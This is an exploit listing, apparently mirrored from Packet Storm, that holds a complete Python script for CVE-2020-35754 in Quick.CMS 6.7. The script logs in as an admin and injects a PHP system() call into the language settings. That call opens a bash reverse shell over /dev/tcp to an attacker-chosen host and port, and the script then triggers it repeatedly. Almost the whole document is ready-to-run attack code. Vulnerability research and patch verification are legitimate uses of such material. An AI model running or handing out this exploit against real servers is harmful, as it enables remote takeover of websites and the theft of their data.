Exploit for Quick.CMS 6.7 Remote Code Execution CVE-2020-35754

Name: Exploit for Quick.CMS 6.7 Remote Code Execution CVE-2020-35754
Rating: 5 (172 reviews)
2021-01-29 | CVSS -0.3
## https://sploitus.com/exploit?id=PACKETSTORM:161189
# Exploit Title: Quick.CMS 6.7 - Remote Code Execution (Authenticated)  
# Date: 2020-12-28  
# Exploit Author: mari0x00  
# Vendor Homepage: https://opensolution.org/  
# Software Link: https://opensolution.org/download/?sFile=Quick.Cms_v6.7-pl.zip  
# Description: https://secator.pl/index.php/2021/01/28/cve-2020-35754-authenticated-rce-in-quick-cms-and-quick-cart/  
# Version: <= 6.7  
# CVE : CVE-2020-35754  
  
#!/usr/bin/python3  
  
import requests  
import sys  
from termcolor import colored  
from time import sleep  
  
print(colored('''###########################################################''',"red"))  
print(colored('''###### Quick.CMS authenticated RCE by mari0x00 #######''',"red"))  
print(colored('''###########################################################''',"red"))  
print("")  
  
if len(sys.argv) != 6:  
print((colored("[~] Usage : python3 quickpwn.py <url> <username> <password> <IP> <PORT>","red")))  
print((colored("[~] Example: python3 quickpwn.py http://192.168.101.105/quick.cms/ john@example.com pass123 192.168.101.101 4444","red")))  
exit()  
url = sys.argv[1]  
username = sys.argv[2]  
password = sys.argv[3]  
IP = sys.argv[4]  
PORT = sys.argv[5]  
  
  
#Start session  
s = requests.Session()  
headers = {'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0'}  
  
  
#Authenticate  
print((colored("[+] Attempting user login","blue")))  
  
login_data = {  
"sEmail": username,  
"sPass": password,  
"bAcceptLicense": "1",  
"iAcceptLicense": "true"  
}  
  
login = s.post(url+"admin.php?p=login", login_data, headers=headers)  
sleep(0.5)  
  
  
#Exploit  
print((colored("[+] Adding shell command","blue")))  
payload = "Back end\\\"; system('/bin/bash -c \\'bash -i >& /dev/tcp/" + IP + "/" + PORT + " 0>&1\\''); //"  
  
shell = {  
"sOption": "save",  
"Back_end_only": payload  
}  
  
exploit = s.post(url+"admin.php?p=languages&sLangEdit=en", shell, headers=headers)  
sleep(1)  
  
#Triggering reverse shell (three times just in case)  
print("")  
print((colored("[+] Triggering the shell. Go nuts!","green")))  
r = s.get(url+"admin.php?p=languages", headers=headers)  
sleep(1)  
r = s.get(url+"admin.php?p=languages", headers=headers)  
sleep(1)  
r = s.get(url+"admin.php?p=languages", headers=headers)